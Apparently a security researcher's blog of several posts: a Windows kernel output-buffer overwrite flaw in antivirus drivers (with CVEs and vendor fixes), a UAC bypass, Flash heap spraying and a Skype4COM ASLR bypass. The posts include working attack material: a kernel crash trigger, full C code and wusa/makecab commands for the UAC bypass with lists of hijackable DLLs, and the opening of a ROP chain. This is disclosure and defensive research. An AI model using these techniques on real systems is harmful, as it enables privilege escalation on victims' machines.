Analysis Of An Interesting Windows Kernel Change Mitigating Vulnerabilities In Some Security Products

Last year I started researching into the Windows kernel to get a better understanding of privilege escalation vulnerabilities. Vulnerabilities in the kernel are a serious issue as they could be used to bypass browsers sandboxes and end up compromising the entire system. In general most people assume that security products are developed with security in mind and can be trusted, so I thought I would start my assessment on security products and see how secure they really are from kernel attacks.  Within a couple of months of research six vulnerabilities had already been discovered in various products from different vendors. What was particularly interesting is that they all exhibited the same type of vulnerability, which only seemed to exist on older operating systems.

This blog post details the technical research carried out in order to pinpoint the root cause as to what had changed from Windows XP and Windows Server 2003 to later Windows operating systems.

The vulnerability
The vulnerability exists when drivers do not validate the output buffer address and output buffer size. Applications wanting to talk to the kernel communicate through the use of the DeviceIOControl function.

DeviceIoControl(hDevice, 0x00222000, inbuffer, BUFSIZE, (LPVOID)0xF4F5F6F7, 0, &dwRetBytes, NULL);

In this example we can see two things of interest, first is that using LPVOID we can send in a hardcoded output buffer address and second is the output buffer length has been defined to 0. Sending this to a vulnerable driver will trigger a bugcheck.

Debugger Output
In the bugcheck analysis below the write address is the same as passed through the DeviceIOControl function, which basically means we have found an arbitrary memory overwrite vulnerability. If we look at the call stack, the bugcheck was triggered in function nt!IopCompleteRequest

kd> !analyze -v
***************************************************************************
*                                                                         *
*                        Bugcheck Analysis                                *
*                                                                         *
***************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: f4f5f6f7, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 804ec09b, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------


Could not read faulting driver name

WRITE_ADDRESS:  f4f5f6f7 

FAULTING_IP: 
nt!IopCompleteRequest+92
804ec09b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

MM_INTERNAL_CODE:  0

CUSTOMER_CRASH_COUNT:  1

DEFAULT_BUCKET_ID:  DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  dos_greyhat.exe

IRP_ADDRESS:  86593dd8

DEVICE_OBJECT: 866e10f0

LAST_CONTROL_TRANSFER:  from 804ec11a to 804ec09b

STACK_TEXT:  
f411baec 804ec11a 86593e18 f411bb38 f411bb2c nt!IopCompleteRequest+0x92
f411bb3c 806f5c0e 00000000 00000000 f411bb54 nt!KiDeliverApc+0xb3
f411bb3c 806f00b3 00000000 00000000 f411bb54 hal!HalpApcInterrupt2ndEntry+0x31
f411bbc8 804e53cc 86593e18 86593dd8 00000000 hal!KfLowerIrql+0x43
f411bbe8 804ec134 86593e18 8659f3e0 00000000 nt!KeInsertQueueApc+0x4b
f411bc1c f7e99562 8659f3e0 86594390 86593dd8 nt!IopfCompleteRequest+0x1d8
WARNING: Stack unwind information not available. Following frames may be wrong.
f411bc34 804e3767 866e10f0 867cf288 806f0070 ghhpoc+0x562
f411bc44 805682ab 86593e48 8659f3e0 86593dd8 nt!IopfCallDriver+0x31
f411bc58 805771e2 866e10f0 86593dd8 8659f3e0 nt!IopSynchronousServiceTail+0x70
f411bd00 80579705 000007e8 00000000 00000000 nt!IopXxxControlFile+0x611
f411bd34 804de7f8 000007e8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
f411bd34 7c90e514 000007e8 00000000 00000000 nt!KiSystemServicePostCall
0012fe3c 00000000 00000000 00000000 00000000 0x7c90e514


STACK_COMMAND:  kb

FOLLOWUP_IP: 
ghhpoc+562
f7e99562 ??              ???

SYMBOL_STACK_INDEX:  6

SYMBOL_NAME:  ghhpoc+562

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ghhpoc

IMAGE_NAME:  ghhpoc.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  54b18dfe

FAILURE_BUCKET_ID:  0x50_ghhpoc+562

BUCKET_ID:  0x50_ghhpoc+562

Followup: MachineOwner
---------


kd> r
eax=00000008 ebx=86593dd8 ecx=00000002 edx=00000000 esi=867cf288 edi=f4f5f6f7
eip=804ec09b esp=f411baa8 ebp=f411baec iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
nt!IopCompleteRequest+0x92:
804ec09b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

Vulnerable Driver Analysis
Reverse engineering the driver the bugcheck is triggered after the call of the function IofCompleteRequest.

The IoCompleteRequest function indicates that the driver has completed all processing for a given IRP and is returning the IRP back to the I/O manager. IRP is an I/O request packet and is how Windows communicates with drivers. The IRP data structure contains information used by drivers.

Comparing IRP data
Since the goal was to find the root cause as to why this vulnerability only applies to older versions of Windows, I started comparing Windows XP to Windows 7. Setting a breakpoint before our call to the IoCompleteRequest function and looking at the IRP data in WinDbg, we can see UserBuffer contains the address of our output buffer address. One noticeable change was the “Flags” value. Windows XP had a value of 0x70 whereas Windows 7 had a value of 0x60030

In Windows XP ebx contains pointer to IRP

kd> dt nt!_irp @ebx
   +0x000 Type             : 6
   +0x002 Size             : 0x94
   +0x004 MdlAddress       : (null) 
   +0x008 Flags            : 0x70
   +0x00c AssociatedIrp    : __unnamed
   +0x010 ThreadListEntry  : _LIST_ENTRY [ 0x8650dfb0 - 0x8650dfb0 ]
   +0x018 IoStatus         : _IO_STATUS_BLOCK
   +0x020 RequestorMode    : 1 ''
   +0x021 PendingReturned  : 0 ''
   +0x022 StackCount       : 1 ''
   +0x023 CurrentLocation  : 3 ''
   +0x024 Cancel           : 0 ''
   +0x025 CancelIrql       : 0 ''
   +0x026 ApcEnvironment   : 0 ''
   +0x027 AllocationFlags  : 0xc ''
   +0x028 UserIosb         : 0x0012fe18 _IO_STATUS_BLOCK
   +0x02c UserEvent        : (null) 
   +0x030 Overlay          : __unnamed
   +0x038 CancelRoutine    : (null) 
   +0x03c UserBuffer       : 0xf4f5f6f7 
   +0x040 Tail             : __unnamed

In Windows 7 esi contains pointer to IRP

kd> dt nt!_irp @esi
   +0x000 Type             : 6
   +0x002 Size             : 0x94
   +0x004 MdlAddress       : (null) 
   +0x008 Flags            : 0x60030
   +0x00c AssociatedIrp    : <unnamed-tag>
   +0x010 ThreadListEntry  : _LIST_ENTRY [ 0x85257f94 - 0x85257f94 ]
   +0x018 IoStatus         : _IO_STATUS_BLOCK
   +0x020 RequestorMode    : 1 ''
   +0x021 PendingReturned  : 0 ''
   +0x022 StackCount       : 1 ''
   +0x023 CurrentLocation  : 3 ''
   +0x024 Cancel           : 0 ''
   +0x025 CancelIrql       : 0 ''
   +0x026 ApcEnvironment   : 0 ''
   +0x027 AllocationFlags  : 0x6 ''
   +0x028 UserIosb         : 0x0023f7b8 _IO_STATUS_BLOCK
   +0x02c UserEvent        : (null) 
   +0x030 Overlay          : <unnamed-tag>
   +0x038 CancelRoutine    : (null) 
   +0x03c UserBuffer       : 0xf4f5f6f7 
   +0x040 Tail             : <unnamed-tag>

IoCompleteRequest Analysis
The exported function IoCompleteRequest in ntoskrnl.exe ends up calling IopCompleteRequest function. We can see on Windows XP that it does a bitwise 40 AND 70 and jumps to the inlined memcpy code which ends up triggering the bugcheck.

On Windows 7 we see the bitwise 40 AND 30 takes a different codepath and never hits our memcpy.

The “test al, 40h” instruction on Windows 7 branches off to another codepath as its doing a bitwise 40 AND 30 instead of bitwise 40 AND 70 as al=30h on Windows 7 which is from the IRP flags value.

IopXxxControlFile Analysis
“So what causes the flags value to be 30h instead of 70h?” was my next question. After some investigation I discovered that IopXxxControlFile held the answer. The IopXxxControlFile function had been called earlier in our call stack. This function does a number of checks and validations on the inputs provided such as if addresses are in user space, buffer lengths, etc. and sets up our data in IRP.

In this function near the beginning it calls the ProbeForWrite function which checks if the address falls in the user space range and writable. The first thing the function does though is check the output buffer length, if zero it returns back to the IopXxxControlFile function without even checking the output buffer address. The ProbeForWrite function below is from Windows XP but is also the same for Windows 7.

Returning back to the IopXxxControlFile function and after a number of checks near the end of the code we see our output buffer address being placed in the IRP UserBuffer field and Flags value being updated to 0x70, all it checks on Windows XP if an output buffer address is available.

On Windows 7 we finally discover the root cause as to what has changed in the IopXxxControlFile function. It checks the output buffer length instead of the output buffer address. Since the output buffer length is 0 the flags value does not get set to 0x70 thus mitigating the vulnerability.

What do these flags values mean?
So what do these values 10h, 30h, 40h and 70h represent? Searching through wdm.h header file I found these definitions:

#define IRP_BUFFERED_IO                 0x00000010
#define IRP_DEALLOCATE_BUFFER           0x00000020
#define IRP_INPUT_OPERATION             0x00000040

The values are set in IopXxxControlFile function by performing an OR operation. So doing an OR on IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER produces a value of 30h
Converting into code it will look something like this

// Windows XP
Irp->Flags = IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER;  
Irp->UserBuffer = pBufferOut;                          
if (pBufferOut) 
  Irp->Flags = IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER | IRP_INPUT_OPERATION;
// Windows 7
Irp->Flags = IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER;  
Irp->UserBuffer = pBufferOut;                          
if (iBufferOutSize) 
  Irp->Flags = IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER | IRP_INPUT_OPERATION;

When it comes to carry its memcpy operation in IoCompleteRequest function it will look something like this

if (Irp->Flags & IRP_BUFFERED_IO)                                   
{                                                                  
  if ((Irp->Flags & IRP_INPUT_OPERATION) 
     &&  (Irp->IoStatus.Status != STATUS_VERIFY_REQUIRED)
     && !(NT_ERROR(Irp->IoStatus.Status)))
  {
       RtlCopyMemory(Irp->UserBuffer, Irp->AssociatedIrp.SystemBuffer, Irp->IoStatus.Information); 
  }
}

Here is it does its bitwise AND operation and dictates its outcome, jump or not to jump.

Conditions of a Vulnerable Driver
During completion of an IRP the I/O Manager copies the data from the system buffer back to the user’s output buffer if using Buffered I/O method (METHOD_BUFFERED) and the status is of a success or warning. The number of bytes to copy is taken from the Irp->IoStatus.Information field.

The following range values indicate error and warning status codes:

  NTSTATUS codes 0xC0000000 – 0xFFFFFFFF are errors
  NTSTATUS codes 0x80000000 – 0xBFFFFFFF are warnings

In the above code we can see it uses the macro NT_ERROR() to evaluate if not an error status.

So if the data is too large for the buffer, the driver completes the IRP with a status STATUS_BUFFER_OVERFLOW (0x80000005), which falls in the warning range, and the Irp->IoStatus.Information will be updated with the buffer size and data copied over. If completed with status STATUS_BUFFER_TOO_SMALL (0xC0000023) which falls in the error range, the I/O Manager does not copy any data back to the output buffer as it sets the Irp->IoStatus.Information to 0.

To reproduce a vulnerable driver for testing purposes use this code in your dispatch routine for Buffered I/O. The IoStatus.Information value has to be 1 or more for an overwrite to take place.

Irp->IoStatus.Information = 4;
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);

Windows supports three I/O transfer methods, which the driver developer can use for reading and writing data to memory. One method being Buffered I/O where the I/O Manager allocates a system buffer of equal size to the users inputted buffer. For write operations, the I/O manager copies the user’s buffer data into the system buffer. For read operations, the I/O manager copies data from the system buffer to the users output buffer when the IRP completes and then frees the system buffer. Buffered I/O is defined in the driver for example like this

CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

So when using METHOD_BUFFERED it copies our system data back to our UserBuffer address when IRP is completed using the IoCompleteRequest function.

Fixing a Vulnerable Driver
Asking the same question to all the vendors on how they each fixed the issue it was interesting to find different approaches had been taken. One approach was

to check if the output buffer address was in the user space

if (Irp->UserBuffer > MmHighestUserAddress)
{
    ntStatus = STATUS_INVALID_PARAMETER;
}

Another approach was to check the size of the output buffer

if (iBufferOutSize < sizeof(ULONG))
{
    ntStatus = STATUS_INVALID_BUFFER_SIZE;
}

Depending on the dispatch conditions just by changing the status value to an error status is enough to resolve the vulnerability.

I would like to thank BullGuard, AVG and K7 Computing for kindly sharing information. A special thanks to BullGuard as they were very helpful and provided a lot more important information which saved me a lot of time on this research. I can’t say the same for the other three vendors: McAfee, Symantec and TrendMicro. All three decided not to share anything; do you see anything confidential in the above code?

Published Advisories
This table below provides information on the products where this vulnerability had been discovered.

Vendor Product OSVDB CVE ID Days Vendor link
McAfee Data Loss Prevention 117345 CVE-2015-1305 99 Advisory
Trend Micro Antivirus Plus
Internet Security
Maximum Security
115514 CVE-2014-9641 70 Advisory
Symantec Altiris Client 116082 CVE-2014-7286 59 Advisory
AVG Internet Security 113824 CVE-2014-9632 26 Release notes
K7 Computing Ultimate Security
Anti-Virus Plus
Total Security
113007 CVE-2014-9643 22 None
BullGuard Antivirus
Internet Security
Premium Protection
Online Backup
114478 CVE-2014-9642 16 Release notes

Advisories published by some vendors were very unprofessional. Trend Micro had to be advised to correct their description, as they didn’t get it right the first time since it had a number of mistakes and was initially published without consultation. Also the fix applies all the way to Trend Titanium products 2015, which was stated in my vulnerability report but not mentioned in their advisory.

For Symantec, well they are not any better. After waiting nearly two months they ended up releasing an advisory advising only to uninstall the driver. Also, their advisory link in their mitigation information section refers to a knowledge base article DOC7993 on how to remove the driver. However, if you take a look as this article it starts off mentioning the MQAC.sys driver and points to a Microsoft link. I had this flagged at the time but no action has been taken. It’s a similar vulnerability so they must have just copied and pasted it without reading it.

What is really shocking is that McAfee took 99 days to release an advisory to the public whereas BullGuard took only 16 days. Does that mean if an exploit was made public we would have had to wait 99 days for an update? Also, McAfee failed to mention in their advisory that it also affects Windows Server 2003, which was clearly stated in my vulnerability report as the product is supported on Windows Server 2003. I however did not test it on Windows Server 2003 R2 (32bit) but did reverse engineer ntoskrnl.exe from Windows Server 2003 R2 (64bit) and did have only the address check in the IopXxxControlFile function. There is a 64bit version for McAfee DLP so should be exploitable too.

Other Vendors
Assessment carried out on some of the security vendors’ products that were not affected from this type of vulnerability are listed below. This is no way an assurance that their products are free from this vulnerability, as there is a possibility some ioctls may have been missed, input buffer sizes may have changed the codepath, device handles not loaded, etc.

  • Agnitum
  • AhnLab
  • Avast
  • Avira
  • BitDefender
  • ClamAV
  • Comodo
  • Emsisoft
  • Eset
  • Fortinet
  • FRISK Software
  • F-Secure
  • G Data
  • Kaspersky Lab
  • Kingsoft
  • Malwarebytes
  • Nano Security
  • Norman
  • Panda Security
  • Sophos
  • TrustPort
  • ThreatTrack Security
  • Webroot
  • Zemana

Other Windows Versions
Since all my tests were on a fully patched Windows XP SP3 32bit and Windows 7 SP1 32bit I thought I’d check some other operating systems. Checking on Windows Server 2003 SP2 Standard Edition 32bit found to have the same issue as Windows XP and during tests exploited successfully. Windows Server 2003 has still got over 5 months before the end-of-life so for those of you still using Windows 2003 better upgrade to a later operating system if you’ve not already done so.

On a clean default installation of Windows Vista 32bit in an unpatched state the output buffer length check had been applied like Windows 7. This means Microsoft did know about this issue and added the check before release.

There are plenty of products designed only to run on Windows Servers, which I have not audited, so maybe it’s a good time for researchers to discover some low-hanging fruit.

Final thoughts
One thing is clear from this research and working with vendors: Just because it’s a big company doesn’t mean you’ll get great service. There are plenty of other vendors doing an excellent job so we should not blindly need to go with the likes of McAfee, Symantec or Trend Micro.

Updating machines is a tedious job at times so really we should be focusing on mitigation products like Microsoft EMET and MalwareBytes Anti-Exploit and not be so dependent on constantly updating machines for security. Bottom line is to upgrade to the latest operating systems as it will have a number of mitigations, checks, validations in place that we probably don’t even know about yet keeping us safe.

 

I’ll start submitting the exploits to Exploit-DB in the next few days and tweet you all once published.

References
http://msdn.microsoft.com/en-us/library/ff550694(v=VS.85).aspx
http://msdn.microsoft.com/en-gb/library/cc704588.aspx
http://msdn.microsoft.com/en-us/library/ff545693.aspx
http://msdn.microsoft.com/en-us/library/windows/hardware/ff548649(v=vs.85).aspx
http://doxygen.reactos.org/d6/dfc/ntoskrnl_2io_2iomgr_2irp_8c_source.html
http://www.cmlab.csie.ntu.edu.tw/~cathyp/eBooks/WindowsNT/Driver/IRPs.pdf  [PDF]
http://www.tutorialspoint.com/assembly_programming/assembly_logical_instructions.htm
http://blogs.msdn.com/b/doronh/archive/2006/12/12/how-to-return-the-number-of-bytes-required-for-a-subsequent-operation.aspx

Bypassing Windows User Account Control (UAC) and ways of mitigation

Securing machines from abuse and compromise in a corporate environment has always been an ongoing process. Providing admin rights to users has always been abused as users have ended up installing unapproved software, change configurations, etc. Not giving local admin rights and they claim they can’t do their work. If malware happens to compromise the machine with full admin rights then you are most likely looking at reimaging the machine.

User Account Control (UAC) gives us the ability to run in standard user rights instead of full administrator rights. So even if your standard user account is in the local admin group damage is limited, i.e. installing services, drivers, writing to secure locations, etc. are denied. To carry out these actions users would need to interact with the desktop such us right click and run as administrator or accept the UAC elevation prompt. UAC was introduced from Windows Vista onwards and contains a number of technologies that include file system and registry virtualization, the Protected Administrator (PA) account, UAC elevation prompts and Windows Integrity levels.

UAC works by adjusting the permission level of our user account, so programs actions are carried out as a standard user even if we have local admin rights on the computer. When changes are going to be made that require administrator-level permission UAC notifies us. If we have local admin rights then we can click yes to continue otherwise we would be prompted to enter an administrator password. These would however depend on what policies have been defined in your environment.

This blog post shows how easily UAC elevation prompts could be bypassed and what actions could be taken to mitigate this threat.

Bypassing UAC
Exploiting UAC is a trivial process. There are two stages needed to be taken to achieve bypass to elevate from standard user rights to administrator user rights. These steps have widely been published so it’s nothing new though stage 2 documents some more DLL hijacking vulnerabilities.

  • Writing to a secure location
  • Exploiting DLL hijacking vulnerability

In order for our bypass to be successful to start off with we need

  1. A medium integrity process
  2. A standard user in an administrators group
  3. Windows executable must be signed by Microsoft code signing certificate
  4. Windows executable must be located in a secure directory
  5. Windows executable also must specify the auto Elevate property in their manifest

Writing to a secure location
There are a couple of ways we can write to a secure location.

  • Using the IFileOperation COM Object
  • Using Windows Update Standalone Installer (wusa.exe)

IFileOperation COM Object
The IFileOperation COM object has a method that we can use to copy files to our secure location as the operation will auto-elevate and able to do a privilege copy. To exploit we can in inject our malicious DLL in a medium integrity process to carry out the operation. Since the COM object is set to auto-elevate the injected process does not need to be marked for auto-elevation in its manifest.

On windows 7 injected processes that have copied successfully are

C:\Windows\explorer.exe
C:\Windows\System32\wuauclt.exe
C:\Windows\System32\taskhost.exe

During tests taskhost.exe only happens to work once after boot and wuauclt.exe doesn’t always work which leaves explorer.exe is only the reliable process to use.

On Windows 8 injected processes that have copied successfully are

C:\Windows\explorer.exe
C:\Windows\System32\wuauclt.exe
C:\Windows\System32\RuntimeBroker.exe

Again explorer.exe is only the reliable process to use I found during my tests and the only one that worked on Windows 8.1

The main part of the code below has been taken from MSDN with just the some minor changes. The SetOperationFlags values used was taken from the UAC bypass code published here.

#include <stdio.h>
#include <Shobjidl.h>
#include <Windows.h>

#pragma comment(lib, "Ole32.lib")
#pragma comment(lib, "shell32.lib")

int WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
FileOperation  *pfo;
IShellItem      *psiFrom = NULL;
IShellItem      *psiTo = NULL;
LPCWSTR pszSrcItem = L"calc.dll";
LPCWSTR pszNewName = L"cryptbase.dll";
LPCWSTR pszDest    = L"C:\\windows\\System32\\sysprep";

HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
if (SUCCEEDED(hr))
{
 hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pfo));
 if (SUCCEEDED(hr))
 {
 hr = pfo->SetOperationFlags( FOF_NOCONFIRMATION |
 FOF_SILENT |
 FOFX_SHOWELEVATIONPROMPT |
 FOFX_NOCOPYHOOKS |
 FOFX_REQUIREELEVATION |
 FOF_NOERRORUI );
 if (SUCCEEDED(hr))
 {
 hr = SHCreateItemFromParsingName(pszSrcItem, NULL, IID_PPV_ARGS(&psiFrom));
 if (SUCCEEDED(hr))
 {
 if (NULL != pszDest)
 {
 hr = SHCreateItemFromParsingName(pszDest, NULL, IID_PPV_ARGS(&psiTo));
 }
 if (SUCCEEDED(hr))
 {
 hr = pfo->CopyItem(psiFrom, psiTo, pszNewName, NULL);
 if (NULL != psiTo)
 {
 psiTo->Release();
 }
 }
 psiFrom->Release();
 }
 if (SUCCEEDED(hr))
 {
 hr = pfo->PerformOperations();
 }
 }
 pfo->Release();
 }
 CoUninitialize();
 }
 return 0;
}

Windows Update Standalone Installer
Another method to use to copy to our secure location is using Windows Update Standalone Installer (wusa.exe). Wusa.exe when executed runs as a high integrity process as its set to auto-elevate in its manifest. For auto-elevation the Windows executable must be signed, located in a secure directory such as C:\Windows\System32 and must specify the autoElevate property in their manifest.

We use wusa.exe to extract a CAB file (cabinet archive file) to our secure location

wusa c:\users\user1\desktop\poc.tmp /extract:c:\windows\system32\sysprep

Here in the example our cab file is called poc.tmp but we can call it whatever we like. Windows comes with the makecab.exe tool so we can even create our cab file

makecab c:\users\user1\desktop\CRYPTBASE.dll c:\users\user1\desktop\poc.tmp

Exploiting DLL hijacking vulnerability
When exploiting a DLL hijacking vulnerability the executable we are going to run again has to be signed; located in a secure directory and must specify the autoElevate property in its manifest in order load as a high integrity process.

On Windows 7 there are three executables that could be exploited and associated DLLs listed below

C:\windows\ehome\Mcx2Prov.exe
C:\Windows\ehome\CRYPTBASE.dll

C:\windows\System32\sysprep\sysprep.exe
C:\Windows\System32\sysprep\CRYPTSP.dll
C:\windows\System32\sysprep\CRYPTBASE.dll
C:\Windows\System32\sysprep\RpcRtRemote.dll
C:\Windows\System32\sysprep\UxTheme.dll

C:\windows\System32\cliconfg.exe
C:\Windows\System32\NTWDBLIB.DLL

On malwr.com a malware submitted on 25th June last year had already been using Mcx2Prov.exe to bypass UAC and day later an exploit had also been published.

The same hash had also been flagged on VirusTotal (38/54) submitted over four months ago.

On Windows 8 there are also three executables that could be exploited and associated DLLs listed below

C:\windows\System32\sysprep\sysprep.exe
C:\windows\System32\sysprep\CRYPTBASE.dll
C:\Windows\System32\Sysprep\dwmapi.dll
C:\Windows\System32\Sysprep\SHCORE.dll

C:\windows\System32\cliconfg.exe
C:\Windows\System32\NTWDBLIB.DLL

C:\windows\System32\pwcreator.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\UReFS.DLL

Finally on Windows 8.1 there are also three executables that could be exploited and associated DLLs listed below

C:\windows\System32\sysprep\sysprep.exe
C:\Windows\System32\Sysprep\SHCORE.dll
C:\Windows\System32\Sysprep\OLEACC.DLL

C:\windows\System32\cliconfg.exe
C:\Windows\System32\NTWDBLIB.DLL

C:\windows\System32\pwcreator.exe
C:\Windows\System32\vds.exe
C:\Program Files\Common Files\microsoft shared\ink\CRYPTBASE.dll
C:\Program Files\Common Files\microsoft shared\ink\CRYPTSP.dll
C:\Program Files\Common Files\microsoft shared\ink\dwmapi.dll
C:\Program Files\Common Files\microsoft shared\ink\USERENV.dll
C:\Program Files\Common Files\microsoft shared\ink\OLEACC.dll

Calling pwcreator.exe (Create a Windows To Go workspace) executable calls vds.exe (Virtual Disk Service) which then loads our DLL and gives us System integrity running in SYSTEM account.

Calling these executables sysprep.exe, cliconfg.exe and pwcreater.exe does produce a GUI window but should be able to easily make it run in the background and then terminated after being exploited. This is something I haven’t looked into so I’ll leave upto you.

Mitigation
The best way to mitigate this bypass is just by not giving users local admin rights to their machines. Majority of user accounts in a corporate environment you should be able to do this reducing the attack surface. This however does not apply home users which would have local admin rights by default.

The actual bypass only works when set to the middle two UAC settings which will let it auto-elevate. To see your settings you need to go to Control Panel – User Accounts – Change User Account Control settings.

Notify me only when apps try to make changes to my computer (default)
Notify me only when apps try to make changes to my computer (do not dim desktop settings)

so we could set to Always notify but this would bring it back to like it was on Windows Vista with constant notifications and not really practical and the user would end up setting it to Never notify which is definitely not a good idea.

Microsoft has given us 10 UAC policies to play with so it’s worth spending some time understanding and testing these out before implementing it in your own domain environment. To see what is applied on your local machine type secpol.msc into Start-Run to open the Local Security Policy snap-in and expand the Local Policies-Security Options folder. Run rsop.msc to view group policies applied on machines in a domain environment.

Looking in the registry these are the default values of UAC

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000005
"ConsentPromptBehaviorUser"=dword:00000003
"EnableInstallerDetection"=dword:00000001
"EnableLUA"=dword:00000001
"EnableSecureUIAPaths"=dword:00000001
"EnableUIADesktopToggle"=dword:00000000
"EnableVirtualization"=dword:00000001
"FilterAdministratorToken"=dword:00000000
"PromptOnSecureDesktop"=dword:00000001
"ValidateAdminCodeSignatures"=dword:00000000

When the slider is moved upto “Always notify me” it changes this value

"ConsentPromptBehaviorAdmin"=dword:00000002

When the slider is moved down to “Notify me only when apps try to make changes to my computer (do not dim desktop settings)” it changes this value

"PromptOnSecureDesktop"=dword:00000000

And when the slider is moved to “Never notify” the values changed are

"ConsentPromptBehaviorAdmin"=dword:00000000
"EnableLUA"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000

Take note that EnableLUA has been disabled completely. This is an extremely dangerous value to be in and should never be disabled so its strongly recommend to set this settings to be enabled in group policies so it always gets applied if settings are reset/changed by users or by previously removed malware.

User Account Control: Run all administrators in Admin Approval Mode

Once disabled not only a malicious process could be able to go straight to high integrity without any bypass but also Internet Explorer would run in medium integrity. UAC gives us the Protected Mode (sandbox) in Internet Explorer providing added security. Internet Explorer normally runs in low integrity child process so if compromised by some IE exploit the damage is minimized as in low integrity there are only a handful of locations it can be written to on the system.

These changes mentioned above have been seen on Windows 7. On Windows 8/8.1 EnableLUA does not change to disabled. So when the slider is moved to Never notify the values changed are only

"ConsentPromptBehaviorAdmin"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000

Since value “EnableLUA”=dword:00000001 does not change, UAC is not completely disabled and Internet Explorer would still run in low integrity.

If however a user logged onto a machine using the local admin account (administrator or whatever renamed on your corporate build) UAC settings does not apply as all processes run in high integrity. This applies to Windows 7/8 and 8.1 so always make sure users DO NOT logon using local admin account, if local admin rights are required better add their domain account to the local administrators group.

If for whatever reason logging on using the local admin account is a necessity then best set this UAC policy to enabled.

User Account Control: Admin Approval Mode for the built-in Administrator account
“FilterAdministratorToken”=dword:00000001

Another option would be to look into renaming or deleting the executables Mcx2Prov.exe, sysprep.exe, cliconfg.exe and pwcreator.exe if definitely not required on the system so the second stage to exploit DLL hijacking fails.

Finally if users do require local admin privileges then worth setting their machine UAC policy to Always notify and they live with the constant notifications.

User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode (2-Prompt for consent on the secure desktop)

Conclusion
This bypass only works when all of the requirements are available to abuse. Remove one requirement and the bypass will fail. Office documents are opened in medium integrity so these are ideal targets to abuse the UAC bypass. Since these bypasses are so effortlessly achieved the only real course of action would be to set UAC to “Always notify” or remove local admin rights for the user. In the end using agents like Microsoft EMET or MalwareBytes Anti-Exploit would be the best mitigating action to take from initially being exploited in the first place.

Here are the source and binaries you can test for yourself. I tested it on Windows Enterprise 7/8/8.1 64bit

References
http://technet.microsoft.com/en-us/magazine/2009.07.uac.aspx
http://technet.microsoft.com/en-us/magazine/2007.06.uac.aspx
http://windows.microsoft.com/en-gb/windows/what-is-user-account-control#1TC=windows-7
http://windows.microsoft.com/en-gb/windows/what-are-user-account-control-settings#1TC=windows-7
http://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know

Heap spraying browsers using Adobe Flash’s ActionScript

It’s been a while since my last post so I thought I’d post this article on heap spraying using Adobe Flash which I have been working on to get a better understanding of the ActionScript language, hopefully it will benefit some readers to test their security layers in their own environment.

After analysing some actual exploits which were using Flash to spray the heap I decided to use the relevant code and started customising it for my own testing purposes. I was surprised that a handful of Endpoint Protection products I tested on failed to detect any sort of heap spray. Spraying using JavaScript or DEPS does however get detected but I’m not sure how it well it would stand if the code were to be obfuscated. Below is a screenshot of the ActionScript spray so you get the idea.

A good portable tool to decompile flash files which I use is “AS3 Sorcerer”. There are some nice features, definitely worth the purchase.

“ActionScript Extractor” is another good and free portable tool but has a bug as when decompiling certain flash files triggers a crash. I didnt investigate this issue if its exploitable so be careful using this tool. Also you’ll most likely need to make more corrections to the code if wanting to recompile again.

I did a quick test on all the major browsers spraying 100 times with 1mb chunks. In the image below it’s interesting to see its child processes of each of the browsers and different integrity levels. Bypassing browser sandboxes is something I’ll be researching in the future so if I do discover anything interesting I’ll be sure to blog about it.

Finally here is the code and examples you can download from here. Password is “exploit” and MD5 hash is 98afdc19007a65be636cc0a8d9fe8d9d .  It includes the exploit for IE’s CVE-2012-4792 using JavaScript, DEPS and Flash. You can use SWFTools as3compile.exe to compile but I mainly used Adobe’s Flex SDK. Here is the direct link for version 4.6.

References:

http://www.adobe.com/devnet/flex/flex-sdk-download-all.html
https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html

Bypassing Windows ASLR using “skype4COM” protocol handler

While investigating an unrelated issue using SysInternals Autoruns tool I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts I decided to check if these libraries have there dynamic base bits set. It turns out that the “skype4com.dll” library has not which means it could be used to bypass Windows ASLR so I got to work writing my rop chain and testing it out.

A quick test to see if it indeed loads up can be done from the code below

<SCRIPT language="JavaScript">  
location.href = 'skype4com:'
</SCRIPT>

Filename - Skype4COM.dll
Path     - C:\Program Files\Common Files\Skype\
MD5 hash - 6e04c50ca4a3fa2cc812cd7ab84eb6d7
Size     - 2,156,192 bytes
Signed   - 03 November 2011 11:46:40
Version  - 1.0.38.0

and here is my rop chain without any nulls.

 0x28025062   # POP EBX # RETN
 0xa13fcde1   # 0xA13FCDE1
 0x28024f71   # POP EAX # RETN
 0x5ec03420   # 0x5EC03420
